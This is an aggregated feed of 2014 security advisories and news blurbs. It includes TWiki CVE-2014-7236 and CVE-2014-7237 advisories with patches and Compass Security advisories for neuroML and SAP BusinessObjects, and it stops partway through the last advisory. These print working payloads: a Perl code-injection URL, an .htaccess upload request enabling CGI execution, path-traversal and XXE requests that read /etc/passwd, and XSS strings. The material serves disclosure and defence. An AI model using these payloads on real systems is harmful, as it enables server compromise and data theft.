TWiki Security Alert CVE-2014-7236: Remote Perl code execution with query string to debug TWiki plugins

October 9, 2014, 11:09 am

≫ Next: TWiki Security Alert CVE-2014-7237: Apache configuration file upload on TWiki on Windows server

≪ Previous: Metasploit: Rejetto HttpFileServer Remote Command Execution

This is an advisory for TWiki administrators: The debugenableplugins request parameter allows arbitrary Perl code execution.

TWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.

* Vulnerable Software Version
* Attack Vectors
* Impact
* Severity Level
* MITRE Name for this Vulnerability
* Details
* Countermeasures
* Hotfix for TWiki Production Release 6.0.0
* Hotfix for Older Affected TWiki Releases
* Verify Hotfix
* Authors and Credits
* Action Plan with Timeline
* External Links
* Feedback

---++ Vulnerable Software Version

* TWiki-6.0.0 (TWikiRelease06x00x00)
* TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)
* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)
* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)
* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)
* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)
* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)

---++ Attack Vectors

Using an HTTP GET request towards a TWiki server, add a specially crafted 'debugenableplugins' request parameter to TWiki's view script (typically port 80/TCP). Prior authentication may or may not be necessary.

---++ Impact

A remote attacker can execute arbitrary Perl code to view and modify any file the webserver user has access to.

---++ Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess [1] and assigned the following severity level:

* Severity 1 issue: The web server can be compromised

---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7236 [7] to this vulnerability.

---++ Details

It is possible to execute arbitrary Perl code by adding a =debugenableplugins= parameter with a specially crafted value. Example:

http://www.example.com/do/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit

The TWiki site is vulnerable if you see a page with text "Vulnerable!".

__Background:__

TWiki allows enabling specific plugins for debug purposes using a 'debugenableplugins' parameter that lists the plugins to enable. In order to support this dynamic loading of plugins, TWiki inserts the plugin name into the following Perl =eval= statement without sanitizing the plugin name:
<verbatim>
my $p = $this->{module};
eval "use $p;";
</verbatim>

---++ Countermeasures

* Apply hotfix (see patch below).
* Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]

---++ Hotfix for TWiki Production Release 6.0.0

Apply the patch listed in the TWiki bug item at TWikibug:Item7558 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.

NOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.

Affected file: twiki/lib/TWiki/Plugins.pm

Patch to sanitize the 'debugenableplugins' parameter:

=======( 8>< CUT )===============================================
--- TWiki/Plugins.pm.save1 2014-01-09 02:10:56.000000000 -0500
+++ TWiki/Plugins.pm 2014-10-01 20:30:36.000000000 -0400
@@ -186,8 +186,11 @@

unless( $allDisabled ) {
if ( $query && defined( $query->param( 'debugenableplugins' ))) {
- @pluginList = split( /[,\s]+/,
- $query->param( 'debugenableplugins' ));
+ @pluginList =
+ grep { /Plugin$/ }
+ map { s/[^a-zA-Z0-9]//go; $_ } # Item7558: Sanitize parameter
+ split( /[,\s]+/, $query->param( 'debugenableplugins' ));
+
} else {
if( $TWiki::cfg{PluginsOrder} ) {
foreach my $plugin( split( /[,\s]+/,
=======( 8>< CUT )===============================================

---++ Hotfix for Older Affected TWiki Releases

Apply above patch (line numbers may vary).

---++ Verify Hotfix

To verify the patch add the following parameter to any TWiki topic:

?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit

The site is vulnerable if a page is returned with text "Vulnerable!"

---++ Authors and Credits

* Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue to the twiki-security@lists.sourceforge.netmailing list
* PeterThoeny for creating the fix, patch and advisory
* HideyoImazu for creating the TWiki-6.0.1 production release [2]

---++ Action Plan with Timeline

* 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]
* 2014-10-01 - developer verifies issue - PeterThoeny
* 2014-10-01 - developer fixes code - PeterThoeny
* 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu
* 2014-10-06 - security team creates advisory with hotfix - PeterThoeny
* 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny
* 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny
* 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny

---++ External Links

[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01
[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 (will be created on 2014-10-09)
[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList
[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList
[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList
[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7236 - CVE on MITRE.org
[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7558

---++ Feedback

Please provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7236 once it exists (this topic will be created on Mon, 2014-10-09).

Please send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday.

-- Peter Thoeny - 2014-10-09

--
> Peter Thoeny - Peter09[at]Thoeny.org
> http://bit.ly/MrTWiki - consulting on enterprise collaboration
> http://TWiki.org - is your team already TWiki enabled?
> Knowledge cannot be managed, it can be discovered and shared
> This e-mail is: (_) private (_) ask first (x) public

↧

TWiki Security Alert CVE-2014-7237: Apache configuration file upload on TWiki on Windows server

October 9, 2014, 11:11 am

≫ Next: [ FORENSICS WALK-THROUGH: DFIRCON EAST SMARTPHONE FORENSICS CHALLENGE ]

≪ Previous: TWiki Security Alert CVE-2014-7236: Remote Perl code execution with query string to debug TWiki plugins

This is an advisory for TWiki administrators: Attaching a specially named file allows remote upload of an Apache configuration file. This applies to native TWiki installations on Windows, the TWiki-VM (virtual machine) running in a Windows server environment is not affected.

TWiki ( http://twiki.org ) is an Open Source Enterprise Wiki and Web Application Platform used by millions of people.

* Vulnerable Software Version
* Attack Vectors
* Impact
* Severity Level
* MITRE Name for this Vulnerability
* Details
* Countermeasures
* Hotfix for TWiki Production Release 6.0.0
* Hotfix for Older Affected TWiki Releases
* Verify Hotfix
* Authors and Credits
* Action Plan with Timeline
* External Links
* Feedback

---++ Vulnerable Software Version

* TWiki-6.0.0 (TWikiRelease06x00x00)
* TWiki-5.1.x (TWikiRelease05x01x00 to TWikiRelease05x01x04)
* TWiki-5.0.x (TWikiRelease05x00x00 to TWikiRelease05x00x02)
* TWiki-4.3.x (TWikiRelease04x03x00 to TWikiRelease04x03x02)
* TWiki-4.2.x (TWikiRelease04x02x00 to TWikiRelease04x02x04)
* TWiki-4.1.x (TWikiRelease04x01x00 to TWikiRelease04x01x02)
* TWiki-4.0.x (TWikiRelease04x00x00 to TWikiRelease04x00x05)

---++ Attack Vectors

Use an HTTP POST request towards a TWiki on Windows server to upload a specially named file (typically port 80/TCP). Prior authentication is typically required.

---++ Impact

A remote attacker can upload a '.htaccess' file that may make uploaded files executable on the server.

---++ Severity Level

The TWiki SecurityTeam triaged this issue as documented in TWikiSecurityAlertProcess and assigned the following severity level:

* Severity 1 issue: The web server can be compromised

---++ MITRE Name for this Vulnerability

The Common Vulnerabilities and Exposures project has assigned the name CVE-2014-7237 [3] to this vulnerability.

---++ Details

If you attach a file named '.htaccess.' (e.g. a '.htaccess' configuration file with a leading null character and a trailing dot) to a TWiki server on Windows, the attached file will be saved with name '.htaccess'. Under the assumption that the Apache is configured to allow directory lever configuration files, it is therefore possible to upload a configuration file that controls the attachment directory. This can be exploited to remotely upload and execute files on the TWiki server.

__Background:__

In order to provide its users with dynamic content functionality, TWiki allows any sort of file to be uploaded and attached into articles and pages. This may seem like a dangerous thing to do, but TWiki protects itself in a pretty good way - It makes sure the file does not contain any dangerous extension (such as .php or .cgi) by using the following regex:

^(\.htaccess|.*\.(?i)(?:php[0-9s]?(\..*)?|[sp]htm[l]?(\..*)?|pl|py|cgi))$

And if it does, it adds a '.txt' extension at the end of it.

On top of that, TWiki also uses an .htaccess file with the 'Options None' directive, which prohibits any use of CGI execution, and with the PHP engine flag set to 'Off', which as one can understand - disables PHP execution.

Apart from all these defenses, TWiki makes sure it uses only the base name of the uploaded file (The file name without any directory path), it removes any trailing dots, and removes any dangerous characters (Such as the famous Null Byte). These security measurements leave us with almost nothing to do. Even without the Perl based defenses, the .htaccess file does a pretty good job in securing the upload directory against any kind of code execution. So, the only logical thing to do is try to upload an .htaccess file directly into the upload folder in order to bypass the original .htaccess file that's located at the root of the TWiki 'pub' directory.

In order to do that we first must upload a file that starts with a dot. In order to do that let's look at the steps TWiki takes in order to secure the file name - first it takes the file name without any directory path, then it removes any leading dots, then it removes any dangerous characters, and finally it checks the file name using the mentioned regex.

So, uploading a file named '.htaccess' just won't work because of the trailing dots removal. But, what if we'll use a file name like '.htaccess'? TWiki will first try to remove any leading dots, but because the name doesn't have any (Because of the leading null byte) none will be removed. Then it will remove any dangerous characters - our null byte - and that will leave us with a nice clean '.htaccess' name.

But, what about the regex? We can see the regex only checks for a file named specifically '.htaccess'. For example, a file named '.htaccesstest' will be uploaded successfully.

But what can we do with that? Well, in Windows, file names ending with a dot will be changed - the dot will be removed. That means uploading a file named '.htaccess.' will pass the regex check, and the dot will be removed when storing the file, resulting in a file named '.htaccess'.

So, if we upload a file named '.htaccess.' and it contains the 'Options' directive as 'All' and the 'SetHandler' directive to allow CGI-scripts to be executed under a different extension, we will be able to execute code on the server.

__Example attack post:__

=======( 8>< CUT )===============================================
POST /Research/TWiki-6.0.0/bin/upload.cgi/Main/WebHome HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7AqcZ2eUSlxvoRFj
Cookie: TWIKISID=e7df45fd5e783fd6a44391dadd782c43
Content-Length: 391

------WebKitFormBoundary7AqcZ2eUSlxvoRFj
Content-Disposition: form-data; name="crypttoken"

22b989482d3418971a50f4914dca0dcf
------WebKitFormBoundary7AqcZ2eUSlxvoRFj
Content-Disposition: form-data; name="filepath2"; filename=".htaccess."
Content-Type: text/plain

Options All
<FilesMatch \.lolz$>
SetHandler cgi-script
</FilesMatch>
=======( 8>< CUT )===============================================

---++ Countermeasures

* Apply hotfix (see patch below), or
* Upgrade to the latest patched production release TWiki-6.0.1 (TWikiRelease06x00x01) [2]

---++ Hotfix for TWiki Production Release 6.0.0

Apply the patch listed in the TWiki bug item at TWikibug:Item7560 [8]. The patch is also listed here, but due to whitespace changes in e-mail it is not recommended to use below patch.

NOTE: In case you use a Perl accelerator make sure to clear the script cache. For example, in case of SpeedyCGI remove the speedy cache (tmp/speedy.*) before restarting Apache.

Affected file: twiki/lib/TWiki/Sandbox.pm

Patch to sanitize uploaded file names:

=======( 8>< CUT )===============================================
--- TWiki/Sandbox.pm.save1 2014-10-01 19:50:45.000000000 -0400
+++ TWiki/Sandbox.pm 2014-10-01 20:13:31.000000000 -0400
@@ -194,8 +194,11 @@
# remember to test with IE.
$fileName =~ s{[\\/]+$}{}; # Get rid of trailing slash/backslash (unlikely)
$fileName =~ s!^.*[\\/]!!; # Get rid of directory part
+ $fileName =~ s/[\x00-\x19]//go; # Item7560: Remove non-printable characters

my $origName = $fileName;
+ # Item7560: Strip trailing dots
+ $fileName =~ s/\.*$//o;
# Change spaces to underscore
$fileName =~ s/ /_/go;
# Strip dots and slashes at start
@@ -214,6 +217,11 @@
# Append .txt to some files
$fileName =~ s/$TWiki::cfg{UploadFilter}/$1\.txt/goi;

+ # Item7483, prevent a null file name
+ if ( $fileName eq '' || $fileName =~ /^\./ ) {
+ $fileName = '_' . $fileName;
+ }
+
# Untaint
$fileName = untaintUnchecked($fileName);

=======( 8>< CUT )===============================================

---++ Hotfix for Older Affected TWiki Releases

Apply above patch (line numbers may vary).

---++ Verify Hotfix

To verify the patch, upload a file with a POST as described in the details. Use any other non-printable character if you can't create a file with a null character, such as '%01.htaccess.'

---++ Authors and Credits

* Credit to Netanel Rubin (netanelr[at]checkpoint.com) for disclosing the issue with detailed description to the twiki-security@lists.sourceforge.net mailing list
* PeterThoeny for creating the fix, patch and advisory
* HideyoImazu for creating the TWiki-6.0.1 production release [2]

---++ Action Plan with Timeline

* 2014-10-01 - Netanel Rubin of Check Point Software discloses issue to TWikiSecurityMailingList [4]
* 2014-10-01 - developer verifies issue - PeterThoeny
* 2014-10-01 - developer fixes code - PeterThoeny
* 2014-10-05 - developer creates new TWiki-6.0.1 patch release [2] with fix - HideyoImazu
* 2014-10-06 - security team creates advisory with hotfix - PeterThoeny
* 2014-10-07 - send alert to TWikiAnnounceMailingList [5] and TWikiDevMailingList [6] - PeterThoeny
* 2014-10-09 - publish advisory in Codev web and update all related topics - PeterThoeny
* 2014-10-09 - issue a public security advisory to fulldisclosure[at]seclists.org, cert[at]cert.org, vuln[at]secunia.com, bugs[at]securitytracker.com, submissions[at]packetstormsecurity.org - PeterThoeny

---++ External Links

[1]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityAlertProcess
[2]: http://twiki.org/cgi-bin/view/Codev/TWikiRelease06x00x01
[3]: http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 (will be created on 2014-10-09)
[4]: http://twiki.org/cgi-bin/view/Codev/TWikiSecurityMailingList
[5]: http://twiki.org/cgi-bin/view/Codev/TWikiAnnounceMailingList
[6]: http://twiki.org/cgi-bin/view/Codev/TWikiDevMailingList
[7]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7237 - CVE on MITRE.org
[8]: http://develop.twiki.org/~twiki4/cgi-bin/view/Bugs/Item7560

---++ Feedback

Please provide feedback at the security alert topic, http://twiki.org/cgi-bin/view/Codev/SecurityAlert-CVE-2014-7237 once it exists (this topic will be created on Mon, 2014-10-09).

Please send an e-mail to twiki-security@lists.sourceforge.net if you have any questions before Monday.

-- Peter Thoeny - 2014-10-09

--
> Peter Thoeny - Peter09[at]Thoeny.org
> http://bit.ly/MrTWiki - consulting on enterprise collaboration
> http://TWiki.org - is your team already TWiki enabled?
> Knowledge cannot be managed, it can be discovered and shared
> This e-mail is: (_) private (_) ask first (x) public

↧

[ FORENSICS WALK-THROUGH: DFIRCON EAST SMARTPHONE FORENSICS CHALLENGE ]

October 9, 2014, 11:39 am

≫ Next: The Rovnix reincarnation

≪ Previous: TWiki Security Alert CVE-2014-7237: Apache configuration file upload on TWiki on Windows server

Today I was asked by a good friend of mine on whether there could be 2 answer(s) to the last question in DFIRCON EAST Smartphone Forensics Challenge.

Being the curious cat, i downloaded the Challenge and have a quick look and decided to write this out while i’m at it. It seems like we are given an iOS backup folder and an Android .apk file.

more here..........http://www.vxsecurity.sg/2014/10/09/forensics-walk-through-dfircon-east-smartphone-forensics-challenge/

↧

The Rovnix reincarnation

October 9, 2014, 11:42 am

≫ Next: Evolution of the Nuclear Exploit Kit

≪ Previous: [ FORENSICS WALK-THROUGH: DFIRCON EAST SMARTPHONE FORENSICS CHALLENGE ]

Back in June 2014, we discovered a new malware campaign that was using a new DGA. This sparked our interest.

After unpacking, some of the samples that we retrieved contained an interesting debug string “ISFB” inside the binary code.

more here..........https://www.csis.dk/en/csis/news/4472/

↧

Evolution of the Nuclear Exploit Kit

October 9, 2014, 1:57 pm

≫ Next: Democracy in Hong Kong Under Attack

≪ Previous: The Rovnix reincarnation

Exploit kits remain an efficient mechanism for cyber criminals to distribute malware. Such kits include exploits for multiple vulnerabilities within a single malicious webpage. Criminals can check operating systems, web browsers and browser plugins for anything that is not fully patched and launch an exploit specific to the out of date software. Using this technique criminals can maximise their chances of infecting visitors but reduce their exposure to only infect those who are vulnerable; presumably in order to remain inconspicuous.

more here...........http://blogs.cisco.com/talos/evolution-nuclear-ek/

↧

Democracy in Hong Kong Under Attack

October 9, 2014, 1:58 pm

≫ Next: Imperva Web Application Attack Report (WAAR) #5

≪ Previous: Evolution of the Nuclear Exploit Kit

Over the last few months, Volexity has been tracking a particularly remarkable advanced persistent threat (APT) operation involving strategic web compromises of websites in Hong Kong and Japan. In both countries, the compromised websites have been particularly notable for their relevance to current events and the high profile nature of the organizations involved. In particular the Hong Kong compromises appear to come on the heels of the Occupy Central Campaign shifting into high gear. These compromises were discovered following the identification of malicious JavaScript that had been added to legitimate code on the impacted websites.

more here.............http://www.volexity.com/blog/?p=33

↧

Imperva Web Application Attack Report (WAAR) #5

October 9, 2014, 7:14 pm

≫ Next: Enhancements to Dyre Banking Trojan

≪ Previous: Democracy in Hong Kong Under Attack

Today, we are proud to release the 5th installment of our annual Web Application Attack Report.

For those of you new to this report, Imperva’s Web Application Attack Report (WAAR) is a thorough analysis of the web application attack surface and attacker behavior trends over a specific period of time – in this case, from August 1, 2013 to April 30, 2014. The findings covered in this report come from an analysis of the data collected by our Community Defense crowdsourced threat intelligence capability (free to all ThreatRadar users), which tracks actual attacks that hit our web application firewalls all over the globe, as well as from our Honeypots and various other intelligence systems.

This year, we have decided to increase the breadth of the report by providing meta-analysis on top of the statistical information, correlating to system types, verticals, technologies as well as to geographical information.

more here.............http://blog.imperva.com/2014/10/imperva-web-application-attack-report-waar-5.html

↧

Enhancements to Dyre Banking Trojan

October 9, 2014, 7:16 pm

≫ Next: Blind & Time Based SQL Injection in Yahoo Contributors Network

≪ Previous: Imperva Web Application Attack Report (WAAR) #5

The Dyre banking Trojan made its first debut in June 2014, targeting large financial institutions across the globe. In September, PhishLabs’ R.A.I.D (Research, Analysis, and Intelligence Division) observed a number of enhancements to the banking Trojan that further increases the danger of the threat.

more here...........http://blog.phishlabs.com/enhancements-to-dyre-banking-trojan

↧

Blind & Time Based SQL Injection in Yahoo Contributors Network

October 9, 2014, 11:37 pm

≫ Next: CSNC-2014-004 neuroML - Multiple Vulnerabilities

≪ Previous: Enhancements to Dyre Banking Trojan

The Yahoo Contributors Network allows writers, photographers, and videographers to share their knowledge and passion (…) and earn money by pushing your unique perspectives…” From the looks of the database and description, the database may have carried sensitive and private personal information for those participating and getting paid from their work. While looking around the website, I came across a two vulnerabilities in the following URL/files: http://contributor.yahoo.com/forum/search/? and http://contributor.yahoo.com//library/payments/data-table/?

more here...........http://nahamsec.com/2014/10/a-tale-of-2-yahoo-bug-bounty-reports/

↧

CSNC-2014-004 neuroML - Multiple Vulnerabilities

October 10, 2014, 2:34 am

≫ Next: WordPress Websites Continue to Get Hacked via MailPoet Plugin Vulnerability

≪ Previous: Blind & Time Based SQL Injection in Yahoo Contributors Network

#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# Product: neuroML
# Version: <=v1.8.1 (Confirmed: v1.8.1)
# Vendor: neuroML.org
# CSNC ID: CSNC-2014-004
# CVD ID: <none>
# Subject: Multiple Vulnerabilities
# Risk: High
# Effect: Remotely exploitable
# Author: Philipp Promeuschel <philipp.promeuschel@csnc.ch>
# Date: 10.10.2014
#
#############################################################

Abstract:
-------------
The NeuroML project focuses on the development of an
XML (eXtensible Markup Language) based description language
that provides a common data format for defining and
exchanging descriptions of neuronal cell and network models.
The current approach in the project uses XML schemas to
define the model specifications.[0]

Affected:
---------
Vulnerable:
neuroML version 1.8.1

Not tested:
Other versions of neuroML

Technical Description:
----------------------
The NeuroML Validator, can be used to check the validity
of NeuroML files.

[Full Path Disclosure]:
  http://www.neuroml.org/NeuroMLValidator/Transform.jsp?localFile=NeuxroMLFiles/Schemata/v1.8.1/Level1/Metadata_v1.8.1.xsd&xslFile=x

Example output:
Unable to locate file /var/lib/tomcat7/webapps/NeuroMLValidator/x

[Local File Inclusion]:
  http://www.neuroml.org/NeuroMLValidator/ViewNeuroMLFile.jsp?localFile=../../../../../etc/passwd

Example output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

[Cross Site Scripting]:
  http://www.neuroml.org/NeuroMLValidator/Transform.jsp?localFile=&xslFile=x%3Cimg%20src=%27s%27%20onError=%27alert%281%29;%27%3E
  http://www.neuroml.org/NeuroMLValidator/Validation.jsp?pastedFile=XSS%3C/textarea%3Ex%3Cimg%20src=%27s%27%20onError=%27alert%281%29;%27%3E

[XML External Entities]:
  http://www.morphml.org:8080/NeuroMLValidator/Transform.jsp?pastedFile=%2B%253C%2521DOCTYPE%2Bfoo%2B%255B%2B%2B%250D%250A%2B%2B%2B%253C%2521ELEMENT%2Bfoo%2BANY%2B%253E%250D%250A%2B%2B%2B%253C%2521ENTITY%2Bxxe%2BSYSTEM%2B%2522file%253A%252F%252F%252Fetc%252Fpasswd%2522%2B%253E%255D%253E%253Cfoo%253E%2526xxe%253B%253C%252Ffoo%253E&xslFile=NeuroMLFiles%2FSchemata%2Fv1.8.1%2FLevel1%2FMorphML_v1.8.1_GENESIS.xsl
Example output:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

Used XML:
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>

Timeline:
---------
2014-05-04: Discovered Flaws
2014-05-05: Contacted Developer
2014-05-05: Developer Response
2014-05-28: Developer fixed all issues
2014-10-10: Disclosure of the advisory

References:
-----------
[0] http://www.neuroml.org/introduction
[1] http://blog.csnc.ch/2012/08/secure-xml-parser-configuration/

↧

WordPress Websites Continue to Get Hacked via MailPoet Plugin Vulnerability

October 10, 2014, 2:37 am

≫ Next: SAP Security Note 1908531 - XXE in BusinessObjects Explorer

≪ Previous: CSNC-2014-004 neuroML - Multiple Vulnerabilities

The popular Mailpoet(wysija-newsletters) WordPress plugin had a serious file upload vulnerability a few months back, allowing an attacker to upload files to the vulnerable site.

This issue was disclosed months ago, the MailPoet team patched it promptly. It seems though that many are still not getting the word, or blatantly not updating, because we are seeing another string of mass exploitation attempts against WordPress websites. Those that are not or have not updated are getting infected repeatedly via this vector, the issue is further compounded because the attackers are using it as a spring board into the reset of their account further compromising their entire account.

more here..........http://blog.sucuri.net/2014/10/wordpress-websites-continue-to-get-hacked-via-mailpoet-plugin-vulnerability.html

↧

SAP Security Note 1908531 - XXE in BusinessObjects Explorer

October 10, 2014, 2:38 am

≫ Next: The Snappening – 200,000 Snapchat accounts hacked

≪ Previous: WordPress Websites Continue to Get Hacked via MailPoet Plugin Vulnerability

#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Untrusted XML input parsing possible in SBOP Explorer
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908531 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable against XML External Entity (XXE)
attacks. This affected the whole application and not only the examples
described below.
This vulnerability could be triggered as unauthenticated user, as the
login request uses vulnerable XML processing as well.

Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
----------------------
BusinessObjects Explorer does not validate user-defined XML inputs.
Additionally, the service does run an XML interpreter allowing
references to external entities. This leads to XML External Entity (XXE)
attacks [1].

In the following example, an explorationSpaceUpdate request has been
used to store in the value of a country the content of file /etc/passwd:

URL: /explorer/polestar_xml.jsp
Request extract:
POST /explorer/polestar_xml.jsp HTTP/1.1
[CUT BY COMPASS]
Content-Length: 33258
=> xmlParameter=<!DOCTYPE dataDiscovery [ <!ENTITY include SYSTEM "/etc/passwd">]>
<dataDiscovery><headers><correlationId>7E7B01A6-E238-716E-2082-
0EB94532438F</correlationId><transactionId>0F14D6BC-ED78-8570-1415-
0EB94532416E</transactionId></headers><session token="[CUT BY COMPASS]"
locale="en_US"/><request><explorationSpaceUpdate infoObjectCUID="[CUT BY COMPASS]"
displayName="" infospaceVersion="2" tip="[CUT BY COMPASS]" [CUT BY COMPASS]
<value>%26include;</value><items selected="[CUT BY
COMPASS]"/></row><row><value>AT</value><items selected="[CUT BY
COMPASS]"/></row><row><value>AU</value><items selected="[CUT BY
COMPASS]"/></row><row><value>BD</value><items
[CUT BY COMPASS]
Response extract:
HTTP/1.1 200 OK
[CUT BY COMPASS]
Content-Length: 214
<?xml version="1.0" encoding="UTF-8"
=> standalone="no"?><dataDiscovery><response><explorationSpaceUpdate id="[CUT BY COMPASS]"
infoObjectCUID="[CUT BY COMPASS]"/></response></dataDiscovery>

The following explorationSpaceDetail request has been used to retrieve
the stored value.

URL: /explorer/polestar_xml.jsp
Request extract:
POST /explorer/polestar_xml.jsp HTTP/1.1
[CUT BY COMPASS]
Content-Length: 533
xmlParameter=%3CdataDiscovery%3E%3Cheaders%3E%3CcorrelationId%3E[CUT BY
COMPASS]%3C%2FcorrelationId%3E%3CtransactionId%3E[CUT BY
COMPASS]%3C%2FtransactionId%3E%3C%2Fheaders%3E%3Csession%20token%3D%22[CUT BY
=> COMPASS]%22%20locale%3D%22en%5FUS%22%2F%3E%3Crequest%3E%3CexplorationSpaceDetail%20id%3D
%22[CUT BY COMPASS]%22%2F%3E%3C%2Frequest%3E%3C%2FdataDiscovery%3E
Response extract:
HTTP/1.1 200 OK
[CUT BY COMPASS]
=> <value>root:!:0:0::/:/usr/bin/ksh
[CUT BY COMPASS]

Timeline:
---------
2013-06-06: Discovery by Stefan Horlacher
2013-06-26: Initial vendor notification
2014-06-10: Vendor releases patch and SAP Security Note 1908531
2014-10-10: Disclosure of the advisory

References:
-----------
[0] https://service.sap.com/sap/support/notes/1908531
[1] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing

↧

The Snappening – 200,000 Snapchat accounts hacked

October 10, 2014, 2:40 am

≫ Next: SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

≪ Previous: SAP Security Note 1908531 - XXE in BusinessObjects Explorer

4 chan has struck again. First there was the celebrity nude leak scandal Fappening, and now there is the Snappening. For a brief history, on August 31, 2014, a collection private and nude pictures of almost 100 female celebrities were posted on the image sharing website 4chan.org. These were later shared by other users on websites and social networks such as Imgur, Reddit and Tumblr. The world got to see very intimate pictures of some of Hollywood’s largest stars. These included Jennifer Lawrence, Kate Upton, Nicky Minaj, Selena Gomez, Scarlett Johanson, Rihanna, Hillary Duff, and Demi Lovato, among others.

This time though, it’s not just nude photos from 100 celebrities. It is nude photos and videos from potentially hundreds of thousands of Snapchat accounts hacked by users of the same website.

more here...........http://kennywithers.com/featured-online-marketing-articles/the-snappening-snapchat-accounts-hacked/

↧

SAP Security Note 1908647 - Cross Site Flashing in BusinessObjects Explorer

October 10, 2014, 2:40 am

≫ Next: Automated configuration analysis for Mozilla's TLS guidelines

≪ Previous: The Snappening – 200,000 Snapchat accounts hacked

#######################################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#######################################################################
#
# Product: BusinessObjects Explorer
# Vendor: SAP AG
# Subject: Cross Site Flashing
# Risk: High
# Effect: Remotely exploitable
# Author: Stefan Horlacher
# Date: 2014-10-10
# SAP Security Note: 1908647 [0]
#
#######################################################################

Abstract:
-------------
BusinessObjects Explorer is vulnerable against Cross Site Flashing [1]
attacks, allowing an attacker to e.g. steal the victim's session.
This vulnerability requires the victim to click on a malicious link
prepared by the attacker.

Affected:
---------
Vulnerable:
SAP BusinessObjects Explorer version 14.0.5 (build 882)

Not tested:
Other versions of BusinessObjects Explorer

Technical Description:
----------------------
The Flash file suffers from a Cross Site Flashing vulnerability. It
is possible to directly load and display the
com_businessobjects_polestar_bootstrap.swf Flash file and specify a
